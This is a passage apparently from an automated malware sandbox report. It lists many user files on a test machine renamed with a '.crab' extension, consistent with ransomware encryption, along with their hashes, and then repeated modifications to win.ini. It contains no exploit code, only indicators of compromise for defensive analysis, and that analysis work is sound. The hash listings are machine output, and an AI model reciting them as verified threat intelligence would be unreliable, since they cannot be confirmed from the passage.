c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457503[[fn=quotable]].thmx.crab 944.80 KB MD5: 2a68b269820f668bb2b7ac3920d7325a
SHA1: a0461f44e5a37b0f403ba94f24f4d8864ec87939
SHA256: 516521d26e6c2105ea22119de4100b2e1e2909a04bc775bebcd9d1ab4aedd676
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457510[[fn=savon]].thmx.crab 1.15 MB MD5: 6287da3ef6b46e47291d95ad28998088
SHA1: 6a492e57ce162d0fa6a8eb79e8ae3dcb70cb009a
SHA256: 864b33bac82959e9c0712aed203c62d68ab6dbd0f7e8bef85e38c6eeb0fc1922
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457515[[fn=view]].thmx.crab 475.71 KB MD5: 9f55f8673acba92f6c949fb24313aad7
SHA1: 57e049b816a676e1b431c993649b2e4b8a05be96
SHA256: 8eb412d29c90058facc9081354c733050779e0249164b23c1c4718592d0603ce
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033917[[fn=berlin]].thmx.crab 953.65 KB MD5: bca46f4d814649098da197788588fada
SHA1: 0e064a80fbc1a445b128166130f506568cbece0c
SHA256: 11a46089125e0c566ab6775710c75fcaba467ee42e26a230a302518c42a5c105
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033919[[fn=circuit]].thmx.crab 1.40 MB MD5: 34a1947a0801dc17406c0f93298d3344
SHA1: e906487821586696e9ee07c989ef507102853228
SHA256: d1d5cf429d60a63024df22188bc4d83a4e70ac27db8d83004b92a62c2fafd30d
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033921[[fn=damask]].thmx.crab 2.12 MB MD5: 87f3343e4fa6b1075a4a6dda370ae4ef
SHA1: 7c9dc78324bd90528d700a2697f4622c1ebf166e
SHA256: 4b763633d94080af1e94f70fa03f02a032d2441ec857ceba86026dcf4557e121
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033925[[fn=droplet]].thmx.crab 1.67 MB MD5: ff9a0134b66d23d2d391e81d74b9da4c
SHA1: 851ff8117c36f3b5a534d7323673d3bdda6c1816
SHA256: f22aa22a42f7d88fd6e53644891547b2db66f6911d6f7f9d5c28e0226cbd0415
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033927[[fn=main event]].thmx.crab 2.79 MB MD5: 811fe4f8f3551b10c3b288af1df6f4e4
SHA1: 8f61501425a2e27f87fd964f1b5acaecc0295904
SHA256: ed2503ccf496978f87aa2ae6bb873fb368097d6015b20b0fc0f8a9fff35320d9
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033929[[fn=slate]].thmx.crab 2.25 MB MD5: e3ef62246d153a0248ef13cac5ce313e
SHA1: 7fa265a039078dcf59e3e57bdcbd96a62b437c97
SHA256: 871a1b45ea01805fcac5da6238a7a57f1e9ad23a2a52529a5b491e12094da9fe
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033937[[fn=vapor trail]].thmx.crab 3.44 MB MD5: 1a94e709ec47286968495a1e6a9e394e
SHA1: b6b4dd4cbf8a8800a704257063a1f854677bf24c
SHA256: b1c66ed8e4b904906b7b9dfb8c76044dfd19faef64827b1364c55cfa149647a0
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001103[[fn=headlines]].thmx.crab 527.48 KB MD5: b87c44634d59b40b0d08f1a26d23b89b
SHA1: d59cffac4af7d3db894e6b58c6e347907c7b09b8
SHA256: 70bec1ff8c9e618328760545d5fd4e667b97a990c825c8ca9f82f9f6492b5617
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001104[[fn=feathered]].thmx.crab 1.96 MB MD5: cc31a460bf806c1a60ef66530c5c6e62
SHA1: 762b32766df675ac722f8b0dd0e6472c1abd2a3c
SHA256: 3444320e6b538a9563af27c85900f43a577f142008ebd2ce7a05769dd414c84a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001105[[fn=crop]].thmx.crab 524.54 KB MD5: 6d9bea2525934483f38de564ef9152fb
SHA1: 25459981954281794c7c32fcb145fb2c7c24f62a
SHA256: d871044e5f2c8122fe8682ceefaf5c41f3c0411eafefcaf9ea014f8f34733b88
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001106[[fn=badge]].thmx.crab 648.90 KB MD5: eb6956b567d3cb161775b38264a69d46
SHA1: d6302bf5550b2df8fded165597c82b4b9282afad
SHA256: 8b156f86bb4a9e14febdf95965a2aee9d3cc10890aecdcaa41362ca60b684338
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001114[[fn=gallery]].thmx.crab 1.04 MB MD5: 09fba22ccdbbd5e9727d33297c512d93
SHA1: 5c1adeda5f78fbaf9ff751165fd421a43a466a62
SHA256: 96d94f8256e2396032dac04f1f5c2fdf7181c17230e5448865193377ce18297e
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001115[[fn=parcel]].thmx.crab 594.38 KB MD5: 05d45c4912a07008dd8ff74c5bdbd264
SHA1: acfbeafab51722807d153d465257da55fed169f4
SHA256: fc8bda262788332ba541e8cf887a62b3d0c0b029a7587d7e8b26a9e2c98f2696
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328884[[fn=architecture]].glox.crab 6.16 KB MD5: 573a188e1e8bacab9835fb24b43d5197
SHA1: 9d0a837cdf55dd95ac8e95ee889df162335a4aa2
SHA256: 0bcd27e4236428956699b226bd5389c532ddb301d6620359104f6b141dee19b2
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328893[[fn=bracketlist]].glox.crab 4.45 KB MD5: 941bc2f4151b3ed9036f5b3368d6d9da
SHA1: fcc833319ecbe400e8ba68c12dc16ad45f1f6c4a
SHA256: 815134c93cc7f0b380d8c3ab9126dbb200d634df468f5407cd3da6c075e55ab1
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328905[[fn=chevron accent]].glox.crab 4.66 KB MD5: cd859ddb9c70bd5001be20406e2df3ec
SHA1: 6cf307388b8b389a8dcfb2df8d1f7c1407c56dcc
SHA256: 1b5cbe6160f58a2adcefb037ef7a25e465ef638ee0a07d5ca72f339ea267bbef
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328908[[fn=circle process]].glox.crab 16.93 KB MD5: 371585d6e5b6f9eb7f311940abf87416
SHA1: 57e649659ec989829e9128762f1f7a8b0073e4c1
SHA256: 6329a05ea923c5b300ee4149130cb8190bab7705f88dca15b654070d8e55c65a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328916[[fn=converging text]].glox.crab 11.63 KB MD5: c6550e85d9e01aad6a583ca60dcf76d6
SHA1: 9a8deefd26082ea58ced2381351fa19222db84e6
SHA256: 1baccac113e2c180bc96dfe546039523417a47e4b7d1817e28ee3d5d3f647df9
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328919[[fn=hexagon radial]].glox.crab 6.40 KB MD5: 49ee0c17ba11d86b1409b9850b7270f0
SHA1: 37958796c416f518feeef71fc8d179115165e679
SHA256: d0bbbb96daf29fe3f27f18c795e55254619b7cb95c762b902556b18dd58e8b62
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328925[[fn=interconnected block process]].glox.crab 9.49 KB MD5: 9cb82e00614a8cfc963702afc3753b73
SHA1: 72cf6f9ce0b71d4373ffb50937a8db03ab57414e
SHA256: 259b6731ab2d1aaa3eaff3ad4f0ea8fc79e7792c5ffdf0974eb9eec2db3d13ac
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328932[[fn=picture frame]].glox.crab 4.74 KB MD5: 6eadfb64e7fbd29ead2c579c91371619
SHA1: cdb5d74d9e1cb217b9a738eb4dbdd34045c493e1
SHA256: 3e126687f69bbb24e64be0804a7d446ce7bd6df9461f97e5249d7db248311574
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328935[[fn=picture organization chart]].glox.crab 7.71 KB MD5: 43f1c80a716115c7873efcec0f17e9f7
SHA1: 60584563a3948468fd9a2b911a57e735fb7518fc
SHA256: 24ce49282030c17aa86a7c737f3a6529f3ec9a49511bdf86e57e42cd374f6220
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328940[[fn=radial picture list]].glox.crab 5.98 KB MD5: 3c677cad9c8902cc6a4516c8a80b5891
SHA1: ee58a0ba281d7c03dae0c0194f053e2d59433004
SHA256: f5809065f63f64fe21ef55c7708c027ffff460035d4facefddb0f0d4f757612a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328951[[fn=tabbed arc]].glox.crab 4.12 KB MD5: aa2e671200612d8688dedeb0b2454717
SHA1: c508b8c648ae7826e044d565d4c2de2f5cfd3c72
SHA256: f4ed3af89971a480b97d07222cd73c7d345ea1eb63472b0f4d930507f1fa7e1d
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328972[[fn=tab list]].glox.crab 5.29 KB MD5: 5b91225625c2f8a750f8c31857b3d03f
SHA1: 81239c47d3fce80eab6ea797d905f31238f73555
SHA256: e6c265cfe4974f049a8c137e72d1ac73c3e4fe924771a6c38d0b1065553bca3e
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328975[[fn=theme picture accent]].glox.crab 6.80 KB MD5: 27c072c9c2262188a90ea7c6445580be
SHA1: 82a5b97d4befa0c31443bcf2bc869ed6fbc11f2b
SHA256: 6e09ddf3c6794aae03a462357def841709a2e09cde17f977e494aeb2a5466d98
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328983[[fn=theme picture alternating accent]].glox.crab 6.01 KB MD5: a8e99e0621051bebf0edeb32a2322cb8
SHA1: da7a56722b01e000a4d60404f49b04006fa997c2
SHA256: 3dca1c4ff1baa5ae81b1b6d066f2ae8efd2487acb07646c34ac74d6d125daafd
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328986[[fn=theme picture grid]].glox.crab 6.57 KB MD5: d0803a1397d0ef0a607b42fca60480f5
SHA1: af68b6ff60c395694b26d5f50c589e9a3c4f44af
SHA256: a28428e3facc10e125826f6ae7630954ec3c28ecab6de32d23fe5822d7552df9
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328990[[fn=varying width list]].glox.crab 3.52 KB MD5: 0364a244657afdd3b6e253017b797d8b
SHA1: 57f2e9ecc924ee05e26ce425082e31abdaf3b686
SHA256: bbb0be6f960687ae2e25902b765afd6c47e7db9af66934eee7ff5994127e3894
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328998[[fn=rings]].glox.crab 5.54 KB MD5: 9e012b5185e39a3b1511b272800ed11a
SHA1: 5cdb61849e565d4ad9fb8efc4ed70612a6c757ad
SHA256: 029c35a08d3d8a1242c3f6fc51cf404c797532a457ad45ccfedca1685caeaeab
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\normal.dotm.crab 18.93 KB MD5: 9e0aac0ff25bc9ea51220b795bb16a5c
SHA1: ad8436a5fff9c2d9edd56700b41b82907f0f3a43
SHA256: a162c8b4afb32d730661713edd17a106cda46236142f6e59bea66e8f4d7cbbd6
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for basic flowchart.xltx.crab 107.88 KB MD5: 929b5339511da21b305abf06cc8c6d06
SHA1: bfd3bf38a0e30cafb4a75cdae8256746cf1a0ee4
SHA256: 0a3099d09838dc9e7348288268a5a821492c4435bbd86126a69c3500289ba312
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for cross-functional flowchart.xltx.crab 141.85 KB MD5: b0dd5be59b66ffdc04917a34e2b119b9
SHA1: 68fc685162acc17bd75fba3a2016b50097e3e74a
SHA256: 65461b81b752af965419a79b9e20541e92286212436749b0876bb8c72b2840d0
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\stock symbols comparison.xltm.crab 1.39 MB MD5: 2f8a6df18f29d15406e5969050e4ded5
SHA1: ce23ddc1041085b3ea8ce34f3f1dcefc0882b9e1
SHA256: 1699a8aacb9b3b401928e2b3527dd14b62bc78da75aa360000db5c47e9dfc62f
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\welcome to excel.xltx.crab 483.66 KB MD5: ec83bf408d850121ef3732b06fd8ebfb
SHA1: 6ece5e589941c61cde1df5e9cebc662399cb1d29
SHA256: a38ac565ead58459e48ea3e01f95d78bc04c68b712b207f06acdc8f8e5ad5728
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\uproof\custom.dic.crab 0.54 KB MD5: e1ca960a724c60bd3c4770d451f7ead8
SHA1: 58f217eff689235b8fb6399b6e33c24b7364da12
SHA256: 1c4ad1deaed832b7ead9f421b5ff92783e26c3d6f56a9d63243f663e595b7382
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\installtime20170518000419.crab 0.52 KB MD5: 9b4c57b3a3fe71a4489507604e8ba9d3
SHA1: 9fb7b037e7440a5391f3da1ea02eedf66eb0c4a3
SHA256: b6671d35c8c0eb9d4fa263f0e2984472038147bf7c3fa921c7389e0aaaba665a
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\addons.json.crab 0.54 KB MD5: 40db0ba19ff6e428582f71c2ce2ae386
SHA1: 87b77690eeda068e41b15bea55b10d481b799f51
SHA256: d3b62d716e8b3bb24d469ce9ce0981f36ffd79305e673088029f2d064d8be572
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-addons.json.crab 450.02 KB MD5: e0180764995ff8247f6679d4be36f734
SHA1: 3c27201da8660c7cf779f0bd90bea10c878e365e
SHA256: 59d9863f90ab095823450eeddbdd48696a27882abea59711dcae68dc664fd9e9
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-gfx.json.crab 27.82 KB MD5: 772ab337d819069fef2e59397407451d
SHA1: 891323e22893ab7e99495999acbd7bb9d8c2507d
SHA256: 9965d0e6557761a9f122577189df8a788a550de9463dc4c14bb9073564ad4012
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-plugins.json.crab 197.20 KB MD5: c2ee76c017c8e618bf9474bbb4eb947e
SHA1: bc80bb9dd4b3e60d0f62554409d2952630fef544
SHA256: c538802c1f27842dfe4fdf23330d67f6ddf760183a976d65f135694b74b622d4
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist.xml.crab 252.41 KB MD5: e27cf6876f2c7e23576a533128b1921a
SHA1: 301760d2d562e19dc3eb77a45f8e2b0b3f8fc99d
SHA256: 5ffa0c351aed0a6b810b8f68af43d931da1d52dbe2ecadbdb5f6b7289185dcc6
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\bookmarkbackups\bookmarks-2017-05-24_14_kl0o5i+exwq3txuldkmf9w==.jsonlz4.crab 1.85 KB MD5: 9dfcb3941994104aba4b87b240f96ae1
SHA1: c050bbed788ce9e8e712475dc12cc8af87b30268
SHA256: 378286578fc4cdf4a51c2bb2370fe26aecf3509f21f627c67b5a466d43556309
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cert8.db.crab 96.51 KB MD5: 5e7acd6476419852bf19613da56a29b0
SHA1: b69ef31af2930c8b7d35063f154b2d72ec8d02cd
SHA256: 2e922c83dd9aa50dae5bcad23df886c1029550bd86afa64dbbe3abd5007fba9b
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\compatibility.ini.crab 0.71 KB MD5: 6b6d66ec736533313b0584d81d89b1d7
SHA1: 25d44e0e3b44a515679c9a266d180ab483e9cb8a
SHA256: 830c996bb0ea41ece9901595747718ebe7c9e64311957ac3772ce1571cac8085
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\containers.json.crab 1.30 KB MD5: d861c5af6c5a8b09400eda3406d8193e
SHA1: 4c3b672a681bd5d204ded429d4ce6a8d92fdfa01
SHA256: 3394b4a6f107bc0bdae3a0f6aa7edabf11a1a9f255d31f686a1353daefbc0562
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\content-prefs.sqlite.crab 224.51 KB MD5: 3bc428ba34128305a6e90058557d75d5
SHA1: ebed683cfef7df63c3e89108d09ada399c6134ce
SHA256: c952c89ed8339c125391ed313554c18203ae5c6167323a4716e08703c5c9d212
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\cookies.sqlite.crab 512.51 KB MD5: 6be884cb970d80dc4c5e0946d06ab59d
SHA1: d9cdc9f5ce7eb8fc6a5d4915c52c126abe694ba4
SHA256: 11cc3d3eecc347e2e0e20d6b578d0633c349a4cf821d8e4fda778d3de0c945fe
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\store.json.mozlz4.crab 0.59 KB MD5: 3b297cb2bb0414b4c92765be86b2081d
SHA1: f3a60b1e0b93605efb2bbaee7c018225cc9dd03b
SHA256: f1e70928df1fc12953c813986c4afac63882b9b54e9ad8ad5a462ff0a49e6b0a
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.crab 6.05 KB MD5: 6ea171bcc2b10342881641359f3e5d3e
SHA1: d55402a0f3ed304b6895beb858b44697f0935143
SHA256: 31e2f41e548243599cf5c9ff57c4394c7760ca9e240f34936853da10bd8f9087
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.crab 5.38 KB MD5: ea78f2756f105db21ae259d0bcd11901
SHA1: e8e4ddb0d032754e95e7080f4307e26424374a48
SHA256: d903387cfcc6c18fa46b35571d4c60b4bc26bf15379a88a808af8d667a42ea4c
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.crab 5.52 KB MD5: 5bc3bdac761c21e06dd15218d551945e
SHA1: 7e85eebf32f421a2648a77dc25d6a90ac67902ca
SHA256: 9c2be6386d97b014bc97a4479dd2708e0a08c07a05b48d9c63aeb8fb1b9ca10d
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.crab 5.70 KB MD5: 763edc1b585093524fbd7372eb64f4f8
SHA1: a6bbf62c17abbc44380eb8c5e68b93e72266fff2
SHA256: 7fcabe18e778912bead3788d194f33d92212bf62e25c8ce7b2dc8809cd5eb5b5
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495597261897.a7b36bf3-f762-448c-874e-9388e91739b4.main.jsonlz4.crab 5.66 KB MD5: 4e921961043cbbeccd9a3ecb1142baa9
SHA1: 4b31567c70c8d7b2493a858b2ed5070497031eb8
SHA256: 7c25de750ff3d7d9732557f0db16cf2bcf07d0fa0962b3e51c46c2ce66ac8302
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.crab 6.55 KB MD5: 419b1675bbf8cc512e4f4d405e2607da
SHA1: 36cb9a00f85e5676518068cb2ff7203e2a1daddf
SHA256: 9178a248357e4ade1b3fd840f10cbcb4ad2232d646fdcd5d53f6539d48e527fb
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.crab 5.57 KB MD5: c29a0978622b36ead5d18087907044ae
SHA1: ff26824ed752e59a84379a022009758c4b221c07
SHA256: 370509354b74bcbe77964c40f82dfa074dd1ec4fc752269f0efcbfd2b8f41344
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\session-state.json.crab 0.65 KB MD5: c8b1038658078b06c8f1193a73df769d
SHA1: dd810317389a165d94dca13b1605374ae44d3120
SHA256: 549f42dd91621c5d7a6eb68d3480878098530fcc66dd393729726944fbcdbc69
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\state.json.crab 0.57 KB MD5: ef053f7613985d2c3755f506a5a97415
SHA1: 46bc4ebd8c00911d5729f17d5738b0777ccacb76
SHA256: e683bcad5f5d159ee51df95c8daf87a22e24818be522722b1ae8a4c33d515149
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.ini.crab 0.70 KB MD5: 5588bbbb0cf9ab783cc8bbb7ad43e8d7
SHA1: cbee9e0e3ac2e41957615c45eefd6a8155353aa1
SHA256: fa7afc9fa2c00f89c25b8b17e05afb4867380c1a69599622f477d0557d31dbeb
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\extensions.json.crab 6.30 KB MD5: 8bf3d5fb7bfe2cf57286f05e6efd3bcb
SHA1: ea843ecca836736b0433e3ad0f4b1a7e912280ce
SHA256: 60282d27e9263559a3190f59d8a4cd01d0a12bfa3414fb725c934b55a8b8a621
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\formhistory.sqlite.crab 192.51 KB MD5: b65db1612370e5243f239f7ddb578586
SHA1: 8cec9133c38c031c04541ad2669023a07c44901f
SHA256: 080a928b635fe1a2e7d8799009b04bc41e9d04dd72a748ad7d5174b09585bdac
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info.crab 0.63 KB MD5: d2402498f0132ca41b2979dec34fb29a
SHA1: f180e9b62fc83c2179ffa849c7c30d0efe030c77
SHA256: 7fc3d76c3f60778cee29cd9f4fccb81e352d356e29021fd835b1924f65608b1b
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\windows\win.ini 0.13 KB MD5: 6925284af85ad12f263841d495d9ce10
SHA1: c34828bf71bb6de98b7b13124485b2cd05f72667
SHA256: 9865372e871cc74e6c5591529aa98c6c23246347dcada03ad140e24ceffe5009
False
c:\windows\win.ini 0.16 KB MD5: 11c4eb258c6bdc5a10b20affc4b5f7a4
SHA1: 37524e578279591e43b03e427df7cf526db168d1
SHA256: 187ba4d43fa5432d8a75543f62a38b80f5273b11398591465e3cf1bcdecdcaaa
False
c:\windows\win.ini 0.19 KB MD5: faca927770777baf80247eef97fd5945
SHA1: 2efd136705d2a584eb56957c3bda6edc274865b0
SHA256: 6babbd2433b0d850d5dd58b91a1b66ea1298856caed2fb8c306b6582e99ba7e2
False
c:\windows\win.ini 0.21 KB MD5: 7acb81ac660223a3bb487c52cb626b9e
SHA1: 05ef933b92823c54679ab2132903737a379bceec
SHA256: 1a2b0fecf267b0a8bad59c36b9f442a47e29ca91c61123dbfdfe70549ff072ee
False
c:\windows\win.ini 0.24 KB MD5: 98afb7c79b5a6e453abda2d15fda6bb0
SHA1: 5c74d1a57ca15e0db3e699790d171a69e3295259
SHA256: b9908ad5af416738acee78d915cba8beb1c27f00b29bc13fbddbef70ad75b508
False
c:\windows\win.ini 0.27 KB MD5: 806a83ccb18ffa8d24efce06715ff449
SHA1: becb974a0a072d604ece82f5139830dc7d3ff31f
SHA256: 3fc864cc8d78c4a867e631a87fa79e043e910c02df0133979ace881ce04ee73a
False
c:\windows\win.ini 0.29 KB MD5: a3d63d00d6ecc48e6a9d7be54f0edb5d
SHA1: f1e6d98f6b2643eea18ca4bc7aef62ec995ed8a8
SHA256: 54c5d9b369cad0ca6652081d4f26aae8b0422466634865a622598df73c224516
False
c:\windows\win.ini 0.32 KB MD5: 5fb1257946dc16358a6340c0e65fda3a
SHA1: 4a49a7e29443d23b9a60aca752a1127bf459b7aa
SHA256: 86113d8b82517e8f7f8f3edfb80ebfb3b751cba3c337fd459b99d32b2d1970ff
False
c:\windows\win.ini 0.35 KB MD5: f0a6d00c7eb787caa46659c4ae60b409
SHA1: 11b4536abada12744d4ad4486296d17f0398b0ae
SHA256: 0c572af08756997d40f18f3698046397549bc603f4b5b791bb5ee466a60e8f70
False
c:\windows\win.ini 0.37 KB MD5: ff54037c97673c037b7934bbe6cc4e89
SHA1: cc44776528267246ca03aaab1533e8b19970a5d8
SHA256: 094ff4aa6378b1405387ee755bf3a3c550e3655b126c734ec5454edc43cf0ca0
False
c:\windows\win.ini 0.40 KB MD5: 8acb0f082b1d0182cc990404743c7963
SHA1: 6cf945d8ceb3448ec7a8aaac08cdca9b50286150
SHA256: d883453e105cef42e5e016f51065fbf183fe4ef251785a28ed18456461fe9824
False
c:\windows\win.ini 0.42 KB MD5: 90e36c235d3974ad2e761783ff1d4b47
SHA1: 7b5a04c64891299889abdb229905b45c2e576cea
SHA256: 86c365431fc40b56055185712453e915503167dd5ac95d194918519f4a6742f0
False
c:\windows\win.ini 0.45 KB MD5: d2700b5dad232728cac09de337b63536
SHA1: 3c6bcb3d21e77e086b0601ac18f7aef65d22d728
SHA256: d69dd8c022d89d443b0be29372cb94af32f931782a016a51c56783be40335ed8
False
c:\windows\win.ini 0.48 KB MD5: 579aa6ba4984590a35aadf4a3b067cdf
SHA1: 369739eeaaac92b5384f13d472101bbacf1f2a4f
SHA256: cd6bce28545239a30eeb3f4dbc8d40935fc1fa15732198f4708be0c9f4ec009a
False
c:\windows\win.ini 0.50 KB MD5: 2bfc98b9a5af95121db04ddbdcf0f5a2
SHA1: 7d0a5788b8f1c49e07a2ac70440d5367d86d853d
SHA256: b882659c9f2221bd78e6d75bfe5c6dd1ddd99b99a8760dbae17ec52c2f3f4e75
False
c:\windows\win.ini 0.53 KB MD5: d5f039d380945410fb0e68c40152756c
SHA1: 9800640dbac6c298797cbe542f1c3260b3111b6e
SHA256: 6b3398021041e0703d80b8a83e52ca63919cacaa5da04473294a77ed07e4f6f7
False
c:\windows\win.ini 0.56 KB MD5: 15d437417e9a85a5d0a289924d6ef006
SHA1: 2536a7ab86b72289fb1fbb3fe6ff467aef105347
SHA256: cc667d6d03439a57f797c8d6f25013d3ad6d5111d404fbae17a3d9421dd5b134
False
c:\windows\win.ini 0.58 KB MD5: d0462746f91b319b3df8f3eeb8175bd7
SHA1: 33030d54b77576bfabec638da10063074183264f
SHA256: e55dedad4756cf6d0b642c2947a64b39f44758409e9bc9b519acec69a3322b72
False
c:\windows\win.ini 0.61 KB MD5: d87d5914b81615d6bc681396ba536290
SHA1: 12de6564354afd490de3dfbc071653e80be79bc7
SHA256: c08266254b79cf2a00e79f87c2e77078a7c2367ab62b69501a85f2d63d89b4b7
False
c:\windows\win.ini 0.64 KB MD5: 92acfc040377f96999b36e01b252bdd2
SHA1: a8d3a539c9ed7fc22d8cf7b9fd4825cf04c4fa96
SHA256: 84db0f89363069acf56be9ba62798d8b40dbab9d48030272610c63fb96c9a829
False
c:\windows\win.ini 0.66 KB MD5: 306df57773be26ec071313e697ff2add
SHA1: 0917cdbf5ab70f61e3ce8a1f682d67b972e4b3d9
SHA256: 8a7b6ddf421b012ed3876faf3dd01cc3e747b028e537e7d8b1cdee4bd8f54472
False
c:\windows\win.ini 0.69 KB MD5: 09688941f5d8e427275eaa17d4cfc04c
SHA1: b5a9b8a2ed4b1c081ccce473d128147e84133e2f
SHA256: afc8f429bde7af75b6681820c433dbd93ada3cb5d00df2b2a8a6f1ad1362a54b
False
c:\windows\win.ini 0.71 KB MD5: a431784f92e4f92f8a6afa6abee1b2b1
